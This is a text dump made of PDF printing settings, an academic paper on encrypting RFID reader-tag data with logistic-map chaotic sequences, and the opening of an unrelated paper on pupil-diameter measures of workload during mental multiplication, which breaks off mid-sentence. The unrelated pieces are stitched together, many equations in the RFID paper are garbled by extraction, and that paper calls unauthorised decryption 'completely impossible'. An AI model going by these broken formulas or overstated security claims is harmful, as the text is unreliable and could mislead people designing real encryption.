/DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_6ymfcev3qva5lpd4wvsschrfkm ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 90 Application of Chaotic Encryption in RFID Data Transmission Security Yang Jianfang School of Computer Science and Engineering Xi’an Technological University Xi’an, China e-mail: perfectyjf@163.com Liu Baolong School of Computer Science and Engineering Xi’an Technological University Xi’an, 710032, China e-mail: liu.bao.long@hotmail.com Yao Huimin Eighth of production plant, the company china petrdeum Changing oilfield, Xi’an Xi’an, 710021, China Abstract—In order to improve the security performance of data transmission in the RFID system, the sequence generated by the chaotic map is used to encrypt the data transmitted between the reader and the tag in the RFID. Based on the unpredictability, extreme sensitivity to initial conditions, and pseudo-random characteristics of chaotic sequences, the information of each electronic tag is encrypted with a unique chaotic sequence. The same operation mechanism is used to encrypt and decrypt data, and a security model based on chaotic encryption is established. At the same time, the read/write control mechanism and security issues are explained. Keywords-Chaotic Encryption; Chaotic Sequence; RFID System; Security Model; I. INTRODUCTION Radio Frequency Identification (RFID), which is a wireless non-contact automatic identification technology, automatically identifies surrounding objects through radio frequency signals, spatial coupling (including inductive coupling and electromagnetic coupling). The basic components of RFID system mainly include background server, reader and tag. In the RFID data transmission, the wired transmission between background server and reader is considered as a secure channel, while the wireless transmission between reader and tag is considered as an unsafe channel. The basic components of the RFID system are shown in the figure: Background server Contr ol sectio n Wireless transmissi on part Reader Tag Data、energy interaction Space coupling element Wired channel Wireless transmission Secure channel Unsafe channel Figure 1. Diagram of the components of the RFID system. RFID technology has been widely used in various fields due to its low cost, fast recognition speed and long service life, such as warehouse transportation management, train/car identification, baggage security inspection, access control attendance and so on. However, a lot of security problems have emerged in the process of widespread application of RFID, and it is precisely because of the remaining security problems of RFID technology that its further application and development are restricted. The security issues of RFID technology mainly come from the wireless transmission channel of readers and electronic tags, including privacy theft between authentication and data transmission. The authentication problem mainly includes the confirmation of the legality of readers and electronic tags, while the data privacy issues include tracking and leaking data information [1]. The purpose of the RFID system is to popularize the application, which requires that the cost of the reader and the electronic tag in the RFID cannot be too high, and the overly complicated security algorithm cannot be used DOI: 10.21307/ijanmc-2019-040 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 91 in the tag, which creates a difficulty for the security solution of the RFID to some extent. In most of the currently proposed RFID system security solutions, it can be roughly divided into physical security methods, cryptographic-based security methods, and a combination of the two. The physical security method is mainly for the protection of electronic tags, including Kill command mechanism, electrostatic shielding, blocking tags, active interference, etc [2]. Some of these methods can affect the functionality of the tag. For example, the Kill command mechanism can't respond to the reader's commands by making the tag ineffective. This prevents the corrupted tag from being activated again and cannot be used again. Although electrostatic shielding can shield the interference from illegal readers or tags, it can also make the tag unrecognizable by legitimate readers and cannot be used effectively. The blocking tag evades the legal tag by simulating a large number of tags, and the active interference is to protect the legitimate tag from being detected by sending unwanted electromagnetic signals to interfere or hinder the operation of the illegal reader. The security method based on cryptography may generally include a security protocol based on a hash function, an encryption algorithm, read and write access control and so on. Chaos is a complex behavior controlled by nonlinear dynamic laws and is a similar random phenomenon that appears in deterministic systems. It has the characteristics of extreme sensitivity of initial values, long-term unpredictability, randomness, and similar broadband spectral noise. These characteristics make chaotic systems very suitable for information encryption [3]. Logistic mapping is one of the most typical types in chaotic systems. The content of this paper is mainly to use Logistic chaotic map to generate chaotic sequences to encrypt the data transmitted between readers and tags in RFID system, which guarantees RFID system security to some extent. II. CHAOTIC SEQUENCE ENCRYPTS RFID TRANSMISSION DATA A. Introduction to chaotic mapping The essence of chaotic encryption is serial cipher encryption. The basic principle is to divide the plaintext data into multiple parts of continuous characters, and then use the generated chaotic key stream sequence to perform encryption calculation with the plaintext characters bit by bit, and use the synchronous generated key stream when the sequence is decrypted, and its basic schematic is shown below: Key sequence generator Key sequence generator Key sequence Ki Key sequence Ki Encryption Algo rithm Ek Decryption Algorithm Dk produce produce action action Cleartext information Ciphertext information Public channel Cleartext information Synchronization key Figure 2. Data information encryption/decryption schematic. The chaotic sequence generator is the core of chaotic encryption, which used to generate the chaotic key sequence. It then converted into an encrypted sequence for encrypting plaintext information through the conversion operation. The chaotic sequence generator can be represented by several parts in the following figure: Initial value converted to real value Chaotic map iteration to generate mapping sequence Map sequence convert encryption sequence Figure 3. Chaotic sequence generator process diagram. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 92 Chaotic map is an important part of chaotic sequence generator, and its general form can be expressed as:  )( 2 1 nnn xxx     Among them,  represents the system parameter, its value range is (0,4), nx represents the iteration value, and takes values in the range of [0,1]. The above equation is used as a mathematical equation for chaotic mapping, and a chaotic iterative sequence for encryption is generated by multiple iterations. Based on the purpose of deep analysis of the characteristics of Logistic mapping, this paper is simulated by matlab, and the logistic mapping bifurcation diagram obtained by taking the initial value is 0.6, while the parameter values are different, is shown in the following figure: Figure 4. Logistic map bifurcation diagram. As can be seen from the above figure, the Logistic map is from the double-period bifurcation into the chaotic state. When the value of  is about 3.5699,the Logistic map enters the chaotic state. Therefore, the  value range of the Logistic map in the chaotic state is (3.5699, 4), and although the Logistic map is a one-dimensional system, it can generate complex chaotic behavior. It can be found that the Logistic mapping system only generates chaotic behavior when the initial value and the parameter value are within a certain range, and the degree and randomness of chaos are also affected by different initial values and different parameters. B. Implementation of chaotic encryption The chaotic sequence is a sequence of chaotic real values generated by chaotic mapping after multiple iterations, and then formed by some transformation operations. Theoretically, the chaotic sequence is a non-periodic sequence with statistical properties close to Gaussian white noise [4]. The initial value and parameter value required for chaotic mapping in the process of starting the iteration are determined by the label, The initial value 0x is obtained by the serial number of the unique identification label, and the value of parameter  is obtained by the read operation keyword, and it is determined according to the user's own needs. Thus, there exists a security policy that the data information of each tag uses a unique chaotic sequence to encrypt. In addition, the iterative sequence generated by the chaotic map is the real field value, and the data processed by the RFID is a binary field. Therefore, the real field value generated by the chaotic map must be converted into a binary sequence for encryption, and the corresponding domain conversion is described in the next section. The following is a detailed explanation of the general encryption process of Logistic chaotic map. The specific process is as follows: a) select the parameter value for  in (3.5699,4)， and design the chaotic sequence generator using (1) to generate the key stream factor sequence; b) use the serial number of the tag as the initial value and enter it into the Logistic system; c) iterate from the current position; d) converting the iterative chaotic real value into a binary form of the key stream sequence, extracting a part as an encrypted sequence; e) select the plaintext data of the specified location as the data to be encrypted; f) the binary encryption sequence extracted in step d) with the plaintext information sequence to perform encryption calculation to obtain a ciphertext sequence; g) The current operation track is used as the initial parameter of the next stage of encryption, and is reserved for use; h) Determine whether the encryption operation is completed. If it is completed, it will enter the end state, otherwise it will return to step c). The above process can be represented by a flow chart as follows: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 93 Begin Determining Logistic Chaotic Mapping Equation Deter mine initial values and parameter values System iterate specified number of times Chaotic real sequences convert into binary sequences Encryption calculation with plaintext information Generate c iphertext sequence Whether the encr yption is complete End The current operation track is used as the initial paramet er of the next stage of encryption Figure 5. Logistic chaotic encryption flow chart. It can be seen that the information is written into the electronic tag after being encrypted by the uniquely determined chaotic sequence, which greatly improves the security of the tag data to a certain extent. C. Domain conversion of chaotic systems and encryption systems The domain of chaotic system processing is the real number field, and the data processed by the RFID system is binary. This inevitably requires the conversion of real and binary values. The conversion mechanism between them is introduced below. When the chaotic sequence generator iteratively generates the chaotic sequence, it is necessary to determine the initial value and the parameter value. In the process of designing, the initial value and the parameter value are associated with the label, and the serial number of the unique identification label is used as the initial value, and the user-defined read operation keyword is used as the parameter value. Here, the serial number and the read operation key are expressed in binary form. The process of converting the real value is as follows: Initial value calculation process: Assuming that the RFID system uses a 16-bit binary number, and the range in which the serial number is converted to a decimal number is (0, 65535). The initial value 0x of the Logistic chaotic system ranges from (0,1), First the calculation factor of 0x is 5 10526.165535/)01(   , The value which obtained by converting the binary number of the serial number into a decimal number and multiplying by the calculation factor is taken as the value of the initial value 0x . Listed below: the binary form of the serial number (1000 0000 0000 1010) converted to a decimal number of 32778, multiplied by the calculation factor ( 510526.1   ) and the initial value 0x =0.50019228. Parameter value calculation process: In the RFID system, the read operation keyword is also a 16-bit binary number. The value of the parameter  in the Logistic chaotic system is (3.5699456, 4). First, the calculation factor of the parameter  is determined to be 6 105622.665535/)5699456.34(   , and the binary number corresponding to the parameter  is converted into a decimal number and multiplied by the calculation factor, and finally 3.5699456 is added as the decimal value of the parameter  . Listed below: The binary form of read operation keyword (1100 0010 0010 0100) is converted to a decimal number of 49700, which multiplied by a calculation factor ( 6 105622.6   ) and equal to 0.32614134, parameter value  =0.32614134+3.5699456=3.89608694. It should be noted that the initial value 0 x is determined by the serial number of the unique identification tag, which indicates that its uniqueness determines that the chaotic sequence iterated by is also uniquely determined, and can be utilized as a private key in the encryption and decryption system. The parameter  is determined by the read operation keyword, and the read operation keyword can be shared by the reader and the tag, and can be utilized as a public key in the encryption and decryption system. The above is the process of converting the binary value into a real value when the chaotic sequence is started. After the chaotic encryption sequence is obtained, it needs to be binarized when encrypting the data transmitted between the reader and the tag in the RFID system. The chaotic signal  nx is converted into a binary sequence stream  nb ,and the quantization International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 94 function )]([ nxT must be introduced in the process of conversion. The mathematical definition is as follows [5][6]:                 k i i k i i Inx Inx nxT U U k k 12 12 0 2 12 0 )(1 )(0 )]([  Where k is an arbitrary integer greater than 0, ,,, 210 kkk III are k2 consecutive contiguous partitions of the initial value 0x . The above equation shows that if the chaotic signal  nx falls within the defined interval of the odd number of the quantization function as the initial bit, the corresponding binary value is 1, if it falls within the defined interval of the even number of the quantization function as the initial bit, the corresponding binary value is 0. After the conversion, because of maintaining the good randomness and unpredictability of the chaotic sequence )}({ nx , The experimental analysis proves that the above quantitative method has excellent statistical characteristics such as uniform 0-1 ratio distribution and autocorrelation [7]. III. RFID SYSTEM SECURITY MODEL AND READ/WRITE CONTROL MECHANISM, SECURITY DESCRIPTION A. RFID system security model The chaotic sequence generated by the above method is used to encrypt and calculate the data information written in the tag, and then sent to the wireless transmission part of the reader for transmission, and the data read back by the tag, the reader also uses the same chaos sequence to decrypte and sent to the background server for processing. In this link, the data touched by the tag, the wireless transmission and reception part and the airborne signal transmission are all chaotically encrypted data, and the ciphertext does not have any useful information. Without knowing the structure of the reader and the details of chaotic encryption, it is impossible to illegally obtain the data in the tag to be decrypted into the original data information, which greatly improves the confidentiality and security of the RFID system. The security model of the RFID system is shown below: Control section Wireless transmis sion part Reader Tag Background server Chaotic encryption module Illegal listener Secure channel Unsafe channel Airborne wireless transmission Chaotic ciphertext form Figure 6. RFID system security model. Based on the above RFID system security model, coupled with the read and write control mechanism of the next section, the security of RFID data is effectively guaranteed. B. read and write control mechanism of Chaotic encryption The legality of the reader and the tag must be verified before the RFID data transmission, which requires the establishment of a read-write control mechanism between them. This control mechanism is established in the case of chaotic encryption, which is in the unsafe communication channel between the reader and the tag. The read and write control mechanism of the RFID system is shown in the following figure: Background server Reader Tag Request，Q (F ) QID E (Q, F ) QID (K , ID ) RT Tag K E (ID ) RT Tag ( , X ) Tag  Figure 7. Read and write control mechanism after chaotic encryption. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 95 The basic process is as follows: RT K is a shared key only by legitimate readers, tags, and servers, and TagID is a unique number that identifies tag information. a) The reader sends an authentication request to the surrounding tags, the tag is activated and waits for the command; b) The tag calculates the received random number Q and its own TagID , such as ),( TagQID IDQfF  , the f operation is a reversible operation, then the tag encrypts QIDF by the shared key RTK to )()( QIDKQID FeFE RT , and then the encrypted result )( QIDFE sent to the reader; c) After the reader receives the )( QIDFE , the decryption operation obtains QIDF , and then sends it to the background server together with the random number Q; d) The background server calculates f reversible operation to get ' Ta g ID , and queries the local TagID to see if ' Ta gTa g IDID  exists. If it exists, it proves the validity of the label, and then sends the matching ),( TagRT IDK to the Read. , otherwise the information which returned to the Reader is that the Tag is illegal; e) After the reader receives the information ),( TagRT IDK of the background server, it encrypts and calculates ),()( TagRTTagK IDKfIDE RT  , and the f operation is reversible and then sent to the label; After the tag receives )( TagK IDE RT , it calculates ))(,( 1' Ta gKRTTa g IDEKfID RT   to see if it is equal to its own TagID . If it is equal, it proves the legality of the reader, so the tag will. passed the data information ),( Tag X in the memory to the Reader. After the Reader obtains the parameter  and the data information TagX , which generates a chaotic decryption sequence together with the initial value 0x ,and decrypted to obtain the original correct information with the obtained data information. If they are not equal, the Reader is not legal and the Tag does not respond. C. Safety instructions In the RFID system security model, the data transmitted by the RFID is encrypted by using the nonlinear characteristics of the chaotic system [8],so that the encrypted RFID data ciphertext is basically similar to the white noise sequence, and there is no law at all, and it is completely impossible to find some characteristics of the original information. Even if the information in the tag is illegally obtained, the original information cannot be decrypted correctly; under the strict protection of the read/write control mechanism, the identity information of the reader and the tag can be effectively verified, and the illegal reader and the illegal tag are avoided. It ensures the legality and security of the data transmitted by the RFID system. IV. CONCLUSION In the context that the wireless unsecure channel between the Reader and the Tag of the RFID system may be subjected to various types of attacks, this paper uses the chaotic encryption sequence generated by the Logistic chaotic map to encrypt the data transmitted by the RFID. The generated ciphertext sequence is equivalent to the noise sequence, having the characteristic of confusion and unpredictability. As a result, the difficulty of ciphertext analysis after encryption is greatly increased. It correspondingly enhanced security and confidentiality of RFID data. In addition, the read-write control mechanism and the domain conversion of the chaotic system and the encryption system are described in detail. However, the chaotic encryption mechanism discussed in this paper still has some drawbacks and shortcomings, such as how to solve the nonlinear dynamic degradation problem of Logistic map and to ensure the randomness of chaotic sequences. These shortcomings need to be studied and solved in the future. ACKNOWLEDGMENT This work is partially supported by Science & Technology Program of Weiyang District of Xi'an City with project “201836". REFERENCES [1] ZHANG Yong-ping, WANG Feng-jian. Research of Chaotic Encryption Based RFID System Information Security[J]. Computer Security, 2010. [2] ZHAO Yu-hua. The research of security protocol in RFID system based on theory of chaotic cryptography[D].Master's Degree Thesis of Hunan University, 2011. [3] DENG Ai-ping, XIAO Ben. Application of Chaotic Encryption Algorithm in RFID Secure Mechanism[J].Materials Science and Information Technology, 2012. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 96 [4] DING Xin. Hyper-chaotic Encryption Based RFID System Informaton Security[J].China Conference, 2006. [5] ZHAO Yu-xin, WANG Wei, LIU Li-qiang. A Design and Analysis for Non-linear Combination Chaotic Stream Cipher Based on Logistic Map[J].Journal of Projectiles and Guides, 2007. [6] QIU Yue-hong, HE Chen, ZHU Hong-wen. One Chaotic Map with Infinite Collapses and Its Quantified Sequences[J].Journal of Shanghai Jiaotong University, 2002. [7] WU Hong, DING Qun, ZHOU Ping. Logistic Chaotic Sequence Design and Aplication in Data Encription [J].Journal of Instrumentation, 2009. [8] Geo-Su Yim. Design of an RFID Communication Protocol Using Synchronized Chaotic Systems[J].Journal of Korea Institute of Information and Telecommunications Technology, 2016. work_6zpvnyjfevhnfiwqfnt3wzyf5y ---- Workload assessment for mental arithmetic tasks using the task-evoked pupillary response Submitted 21 May 2015 Accepted 22 July 2015 Published 12 August 2015 Corresponding author Joost de Winter, j.c.f.dewinter@tudelft.nl Academic editor Helen Petrie Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.16 Copyright 2015 Marquart and de Winter Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Workload assessment for mental arithmetic tasks using the task-evoked pupillary response Gerhard Marquart and Joost de Winter Department of BioMechanical Engineering, Faculty of Mechanical, Maritime and Materials Engineering, Delft University of Technology, Delft, The Netherlands ABSTRACT Pupillometry is a promising method for assessing mental workload and could be helpful in the optimization of systems that involve human–computer interaction. The present study focuses on replicating the studies by Ahern (1978) and Klingner (2010), which found that for three levels of difficulty of mental multiplications, the more difficult multiplications yielded larger dilations of the pupil. Using a remote eye tracker, our research expands upon these two previous studies by statistically testing for each 1.5 s interval of the calculation period (1) the mean absolute pupil diameter (MPD), (2) the mean pupil diameter change (MPDC) with respect to the pupil diameter during the pre-stimulus accommodation period, and (3) the mean pupil diameter change rate (MPDCR). An additional novelty of our research is that we compared the pupil diameter measures with a self-report measure of workload, the NASA Task Load Index (NASA-TLX), and with the mean blink rate (MBR). The results showed that the findings of Ahern and Klingner were replicated, and that the MPD and MPDC discriminated just as well between the lowest and highest difficulty levels as did the NASA-TLX. The MBR, on the other hand, did not differentiate between the difficulty levels. Moderate to strong correlations were found between the MPDC and the proportion of incorrect responses, indicating that the MPDC was higher for participants with a poorer performance. For practical applications, validity could be improved by combining pupillometry with other physiological techniques. Subjects Human–Computer Interaction Keywords Pupillometry, Human factors, Pupil diameter, Cognitive load INTRODUCTION Mental workload is an important psychological construct that is challenging to assess on a continuous basis. A commonly used definition of mental workload is the one proposed by Hart & Staveland (1988). These authors defined workload as “the cost incurred by a human operator to achieve a particular level of performance.” (p. 140). A valid and reliable assessment method of workload could be helpful in the optimization of systems that involve human–computer interaction, such as vehicles, computers, and simulators. One promising method for measuring workload is pupillometry, which is the measurement of the pupil diameter (e.g., Goldinger & Papesh, 2012; Granholm & Steinhauer, 2004; Klingner, Kumar & Hanrahan, 2008; Laeng, Sirois & Gredebäck, 2012; Marshall, 2007; Palinko et al., 2010; Schwalm, Keinath & Zimmer, 2008). How to cite this article Marquart and de Winter (2015), Workload assessment for mental arithmetic tasks using the task-evoked pupillary response. PeerJ Comput. Sci. 1:e16; DOI 10.7717/peerj-cs.16 mailto:j.c.f.dewinter@tudelft.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.16 http://dx.doi.org/10.7717/peerj-cs.16 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Two antagonistic muscles regulate the pupil size: the sphincter and the dilator muscle. Activation of these muscles results in the contraction and dilation of the pupil, respectively. During a mentally demanding task, the pupils have been found to dilate up to 0.5 mm, which is small compared to the maximum dilation of about 6 mm caused by changes in lighting conditions (e.g., Beatty & Lucero-Wagoner, 2000). The involuntary reaction of the pupil to changes in task conditions is also called the task-evoked pupillary response (TEPR; Beatty, 1982). In the past, TEPRs were obtained at 1–2 Hz by motion picture photography (Hess & Polt, 1964). This required researchers to measure the pupil diameter manually frame by frame (Janisse, 1977). Nowadays, remote non-obtrusive eye trackers are increasingly being used to automatically measure TEPRs, as these devices are getting more and more accurate. Over the years, researchers have encountered a few challenges in pupillometry. Reflexes of the pupil to changes in luminance, for example, may undermine the validity of TEPRs. One way to improve validity is to strictly control the luminance of the experimental stimuli, but this limits the usability of pupillometry. Marshall (2000) reported she found a way to filter out the pupil light reflex using wavelet transform techniques. She patented this method and dubbed it the “index of cognitive activity”. The influence of gaze direction on the measured pupil size is another issue. Where Pomplun & Sunkara (2003) reported a systematic dependence of pupil size on gaze direction, Klingner, Kumar & Hanrahan (2008) argued that the ellipse-fitting method for the estimation of the pupil size is not affected by perspective distortion. In the last few decades many researchers have investigated the pupillary response for different types of tasks. Typically, the dilation was found to be higher for more challenging tasks (Ahern, 1978; Kahneman & Beatty, 1966), including mental arithmetic tasks (Boersma et al., 1970; Bradshaw, 1968; Hess & Polt, 1964; Schaefer et al., 1968). Not only task demands have been found to influence the pupil diameter, but also factors like anxiety, stress, and fatigue. Tryon (1975) and Janisse (1977) extensively reviewed known sources of variation in pupil size. Back then, Janisse (1977) commented on the underexplored area of whether pupillary dilations reliably reflect individual differences in intelligence. Ahern (1978) discovered that persons scoring higher on intelligence tests showed smaller pupillary dilations on tasks of fixed difficulty. In a more recent study, Van der Meer et al. (2010) found greater pupil dilations for individuals with high intelligence than with low intelligence during the execution of geometric analogy tasks. Thus, the results are not consistent and demand further investigation. The present study focuses on replicating the pupil diameter study by Ahern (1978) for mental multiplications of varying levels of difficulty. Ahern (1978) found that the more difficult multiplications yielded a greater mean pupil diameter. In her research, Ahern (1978) used a so-called television pupillometer (Whittaker 1050S) that was able to measure the pupil diameter in real-time. Specifically, the device processed images obtained from an infrared video camera, identified the pupil diameter using a pattern-recognition algorithm, and computed the diameter of the image of the pupil (Beatty & Wilson, 1977). Participants used a chin-rest and infrared eye illuminator, and the camera was positioned Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 2/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 approximately 15 cm from the participant’s left eye. Our study is also intended as a follow-up study of Klingner (2010). Klingner (2010) recently replicated Ahern’s (1978) results with a remote eye tracker (Tobii 1750) having a similar working principle as the eye tracker used by Ahern (1978). In Klingner (2010), the participants sat approximately 60 cm from the screen and infrared cameras, and they did not use a chin-rest or head-mounted equipment. In his analyses, Klingner (2010) used the average of the two eyes’ pupil diameters. With a large number of participants (30 in our study, 39 in Ahern, 1978, and 12 in Klingner, 2010) and trials (1,350, 1,248, and 632, respectively), and a higher measurement frequency (120 Hz, 20 Hz, and 50 Hz, respectively), the present study aimed to obtain the TEPRs for three levels of difficulty of mental multiplications. We report the mean pupil diameter change (MPDC) with respect to the baseline pupil diameter right before the presentation of the multiplicand, as was also done by Ahern (1978) and Klingner (2010). In addition, we report the absolute mean pupil diameter (MPD). Laeng, Sirois & Gredebäck (2012) explained that pupil diameter responses exhibit both a phasic component (i.e., ‘rapid’ responses to task-relevant events) as well as a tonic component (i.e., ‘slow’ changes in the baseline pupil diameter). The MPDC allowed us to assess the TEPR, while the MPD allowed us to determine whether the baseline itself differed as a function of the difficulty of the multiplications. Furthermore, in our study, the mean pupil diameter change rate (MPDCR), a measure introduced by Palinko et al. (2010), was examined. The MPDCR is the discrete-time equivalent to the first derivative of the pupil diameter and may be useful for assessing moment-to-moment changes in mental workload. While Ahern (1978) and Klingner (2010) statistically compared the maximum dilation and mean dilation between the difficulty levels of the mental multiplications, we applied a more fine-grained approach where the MPDC, MPD, and MPDCR were subjected to a statistical test for each 1.5 s time interval in the calculation period. Another way in which our research differs from the works of Ahern (1978) and Klingner (2010) is that we included two additional measures of mental workload. First, we compared the effect sizes of the pupil diameter measures with those obtained with a classic subjective measurement method of workload, the NASA-TLX. Second, we assessed the mean blink rate (MBR). The relation between mental workload and blink rate has been unclear (Kramer, 1990; Recarte et al., 2008; Marquart, Cabrall & De Winter, 2015), and our aim was to clarify this relationship. The numbers in our study were presented visually in order to gain temporal consistency, as was also done by Klingner (2010; cf. Ahern, 1978, in which the numbers were presented aurally). Furthermore, as in Klingner (2010), the pupil diameter was recorded with an automatic remote eye tracker (SmartEye DR120). METHOD Ethics statement The research was approved by the Human Research Ethics Committee (HREC) of the Delft University of Technology (TU Delft ‘Workload Assessment for Mental Arithmetic Tasks Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 3/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Figure 1 Experimental equipment: monitor with built-in eye tracker (SmartEye DR120), chin-rest, and keyboard. using the Task-Evoked Pupillary Response: January 29, 2015). All participants provided written informed consent. Participants Thirty participants (2 women and 28 men), aged between 19 and 38 years (M = 23, SD = 4.1 years) were recruited to volunteer in this experiment (25 BSc/MSc students and 5 persons with an MSc degree). Individuals wearing glasses or lenses were excluded from participation. All participants read and signed an informed consent form, explaining the purpose and procedures of the experiment and received e 5 compensation for their time. Equipment The SmartEye DR120 remote eye tracker, with a sampling rate of 120 Hz, was used to record the participant’s pupil diameter, eyelid opening, and gaze direction while sitting behind a desktop computer (see Fig. 1). The pupil diameter was the average of the left and right pupil diameter, as provided by the SmartEye 6.0 software. The software estimates the pupil diameter as the major axis of an ellipse that is fit to the edge of the pupil. In order to obtain more accurate measurements, a chin-rest was used. The eye tracker was equipped with a 24-inch screen, which was positioned approximately 65 cm in front of the sitting participant and which was used to display task-relevant information. The outcome of a task had to be entered using the numeric keypad of a keyboard (cf. Ahern, 1978 in which participants used a keyboard, and Klingner, 2010 in which participants used a touchscreen). The experiment took place in a room where there was office lighting delivered by standard fluorescent lamps and where daylight could not enter. Our approach to room illumination was similar to that used by Klingner (2010). We acknowledge that a stricter Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 4/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Figure 2 Task display during accommodation, pause, and calculation period. control of lighting is possible. For example, Janisse (1977) reported that he ensured constant illumination of his experimental lab by feeding all electric current used in the room through a constant voltage transformer. No such strict control of illumination was applied in our research nor did we measure the degree of ambient lighting. However, because the experimental conditions were counterbalanced, we reasoned that there could be no systematic effect of ambient lighting on our results. Furthermore, we used a screen background with variable brightness, designed to minimize the pupillary light reflex in case a participant looked away from the center of the screen (Fig. 2; Marquart, 2015). The corresponding image file is available in Supplemental Information. Procedure The participants were requested to perform 50 trials of mental arithmetic tasks (multipli- cations of two numbers), five of which were used as a short training. The remaining 45 trials were presented in three sessions of different levels of difficulty (easy, medium, and hard; see Table S1). Level 1 contained the 15 easiest multiplications (outcomes ranging between 80 and 108), Level 2 contained 15 multiplications of intermediate difficulty (outcomes between 126 and 192), and Level 3 contained the 15 hardest multiplications (outcomes between 221 and 324). The sequence of the three sessions was counterbalanced across the participants. Each trial was initiated by the participant by pressing the enter key and started with a 4 s accommodation period, followed by a 1 s visual presentation of two numbers (multiplicand and multiplier) between 6 and 18, with a 1.5 s pause in between (Table 1). The participants were asked to multiply the two numbers and type their answer on the numeric keypad 10 s after the multiplier disappeared. Thus, the total duration of one trial Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 5/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16#supplemental-information http://dx.doi.org/10.7717/peerj-cs.16/supp-2 http://dx.doi.org/10.7717/peerj-cs.16/supp-2 http://dx.doi.org/10.7717/peerj-cs.16 Table 1 Timeline of an individual trial. Period Start time (s) End time (s) Symbol Accommodation 0.0 4.0 XX Baseline 3.6 4.0 XX Multiplicand 4.0 5.0 08 Pause 5.0 6.5 XX Multiplier 6.5 7.5 16 Calculation 7.5 17.5 XX Response 17.5 When pressing enter key N/A was 17.5 s (4 + 1 + 1.5 + 1 + 10). When the numbers were not presented, a double “X” was shown to avoid pupillary reflexes caused by changes in brightness or contrast. After each of the three sessions, participants were asked to fill out a NASA-TLX questionnaire to assess their subjective workload on six facets: mental demand, physical demand, temporal demand, performance, effort, and frustration (Hart & Staveland, 1988). All questions were answered on a scale from 0% (very low) to 100% (very high). For the performance question, 0% meant perfect and 100% was failure. The participants’ overall subjective workload was obtained by averaging the scores across the six items. The total duration of the experiment was approximately 30 min. Instructions to participants Before the experiment started, the participants were informed that they had to do 50 mul- tiplications, five of which would be used as a short training. They were also told that the re- maining 45 trials were presented in three sessions of varying difficulty (easy, medium, and hard). The participants were requested to position themselves in front of the monitor with their chin leaning on the chin-rest. They were instructed to stay still, keep their gaze fixed, focus (not stare) at the center of the screen throughout a trial. In addition, participants were asked to blink as little as possible, obviously without causing irritation, and to start each trial with ‘a clear mind’ (i.e., not thinking about the previous trial). If the participants could not complete the multiplication, they were instructed to enter zero as their answer. Data processing The data were processed in two steps. In the first step, the missing values in the pupil diameter data (lost during recording) were removed and the signals were repaired with linear interpolation (see Fig. 3A, for an illustration). On average, 1.2% of the data were lost, so this processing step did not substantially influence the results. In the second step, blinks and poor-quality data were removed. During a blink, the eyelid opening rapidly diminishes and then increases in a few tenths of a second until it is fully open again. It is impossible to track the pupil diameter while blinking. The pupil diameter quality signal (provided by the SmartEye software) was used to filter out the poor quality data. This signal ranges from 0 to 1, with values close to 1 indicating a good quality (SmartEye, 2013). All data points with a pupil diameter quality below 0.75 were removed. Trials containing less than 70% of the data were excluded from the analysis. Of the initial 1,350 trials from 30 participants, 1,125 Marquart and de Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.16 6/20 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.16 Figure 3 Illustration of data processing. (A) Pupil diameter (PD) before and after linear interpolation for missing values. (B) Pupil diameter before and after linear interpolation for poor-quality data. trials passed these criteria (394 for Level 1, 384 for Level 2, & 347 for Level 3; the entire level 2 session of one participant [15 trials] was discarded). The gaps in the 1,125 trials were filled using linear interpolation (Fig. 3B). The last 0.4 s of the accommodation period was defined as the pupillary baseline, as was done by Klingner (2010). The mean pupil diameter of the 